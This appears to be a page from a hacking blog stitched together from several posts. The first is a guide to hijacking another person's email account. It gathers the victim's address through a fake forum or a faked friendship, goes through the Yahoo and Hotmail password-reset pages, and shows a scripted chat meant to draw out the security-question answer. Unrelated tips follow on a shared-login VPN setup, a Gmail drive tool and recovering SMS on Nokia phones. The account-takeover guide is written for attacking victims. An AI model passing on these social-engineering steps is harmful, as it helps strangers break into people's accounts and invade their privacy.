You may say well, how do I even get their email. That's very simple. If you don't have your victim's email already i'm gonna show two ways on how to get it.


1. Lure Method
You can make a fake forum, and lure people to it. Once they make an account you the Admin can go to their account and see what email they used, some forums such as ProBoards allow Admins actually allow access to the members IP Address. So once your on their profile you can get their email that way.

2. BeFriend Method
Lets say your on an online, and you want to hack another person's email because he maybe scammed your friend or something, well you could try to be friends with this person and earn his trust. Earning someones trust can take a while. So I suggest you make that friendship last. When you become friends with them and earn their trust, tell them you have a email account and wanted to know if you would be friends with him on your email account.


Part 1

Ok now that you have the victims email address its time to start the process.

On any email, there is a "forgot your password" option. If you click it, it may ask you something like:

Yahoo:

What problem are you having with your Yahoo! account?

ׄ I have a problem with my password
ׄ I forgot my Yahoo! ID
ׄ My account may have been compromised



Windows Live/Hotmail:

Get help with a forgotten password and other problems signing in
What problem are you having signing in?

ׄ I forgot my password
ׄ I know my password and Windows Live ID, but can't sign in
ׄ I think someone else is using my Windows Live ID


Your going to to select the one that says "I forgot my password" or "I have a problem with my password".

When you have selected that it's most likely going to ask you the Email Address, and to type some characters in a box. After you've done that read down below.


If you using Windows Live it should say something like this:

Reset your password
Account► Reset your password
Select an option for resetting your password.

ׄ Security Question

ׄ Customer support


If your using Yahoo it should say this:

How do you want to reset your password?
We will compare the information you enter with the information we have on file for your account.

ׄSend a text message to my mobile phone:
______________________
[ ]
[_____________________]

Mobile charges may apply. This option may not be available for all carriers in your area.


This option might not be supported on all wireless carriers in your region.

ׄUse my secret questions.


If it doesn't have a security question option, try another victim's email.




Part 2:

Once you have the Security Question, try to start up a conversation with the victim. Ask him to ask you some questions. Then ask him a few questions. Make sure one of those questions are the security question. Try to stay on topic.

Example:

Security Question: Where were you born?


You: I live in Chicago

Victim: oh really

Victim: cool

You: We have the best resturants and the best video game stores

Victim: wow I wish I lived there lol

You: Hey so where do you live?

Victim: oh, live in *****, **


Once you have the answer to security question you are done .

Lord Malware !

Hide IP using VPN [NO SOFTWARES]

Hide IP using VPN [NO SOFTWARES]

1. Open the "Control Panel"


2. Click on "Network and Internet"


3. Click "Network and Sharing Center"


4. In the box: "Change your Network Settings"

Choose "Set up a new connection or network"


5. In the box: "Choose a connection oppion"
Choose "Connect to the Internet"


6. Choose "Set up a new connection anyway"


7. Choose "Broadband (PPPoE)"



8. Example:

Username: free
Password: 1142

Connection name: us.gofreevpn.com

9. Connect..

How to convert your Gmail space into extra HDD

Today I will teach how to convert your Gmail space into extra HDD space 10GB.

1) Download Gmail drive-->DOWNLOAD

2) Run it;

3) Restart your computer and then go to "My Computer" and there are another disk;

4) Click on it and it asks for an username/password;

5) Place there all your stuff...

You can create 1 disk ,but you can login with 2 different Gmail accounts.That means you can get 30GB if you have 3 gmail accounts.





How-to-recover-deleted-sms-from-sim or phone

How-to-recover-deleted-sms-from-sim or phone

Have you deleted SMS messages that you wish had not gotten deleted? You will be happy to know there are a number of different software that can help you recover the messages you need and want, but not all of them are free and you need to purchase the software. However, if you own a Nokia phone you might be in luck, as there are very good chances of message recovery from your cellphone without need of any specialized data recovery software for free. In this tutorial I will explain, what are the steps to be followed in order to recover deleted SMS from a SIM card or phone memory.

STEPS INVOLVED:
1. First of all download and install FExplorer, excellent file manager and also sends files via Bluetooth.


DOWNLOAD:
http://www.mediafire.com/?wzdzsejfksq


2. Launch FExplorer and navigate to C: if you use Phone Memory to store your messages (default) and D: if you use Storage Card as your SMS storage location.

3. Now navigate to and open "system" folder.

4. Now open the "mail" folder.

5. This folder should contain many folders named similar to 0010001_s etc. with files named similar to 00100000 etc. These files are the actual deleted messages. Simply, use the FExplorer inbuild text viewer to view these files. You will need to browse through every folder and open all files inside them until you get the required SMS.

This tool includes more great fetures like:
Cut, copy & paste files
Check date modified & size
Display free space available
View file with inbuilt text viewer
Cut, copy, create & paste directories
File find. (although this only works within a directory)
Take screenshots
Set your backlight to be permanently on
Send files via bluetooth. (may be necessary to rename .sis to .sis_)
Compress memory - increasing available free memory ...and much more.
All of all FExplorer is a handy file explorer application for your Series 60 phone. With a wide range of features, tips and tricks, FExplorer will become one of your favorite mobile applications
Attached Thumbnails Attached Thumbnails Click image for larger version. 

Name: fexplorer-v3.jpg 
Views: 1 
Size: 37.9 KB 
ID: 175  
 
Design by Vinit Varghese | Bloggerized by Hemanth Joseph - Premium Blogger Themes | Online Project management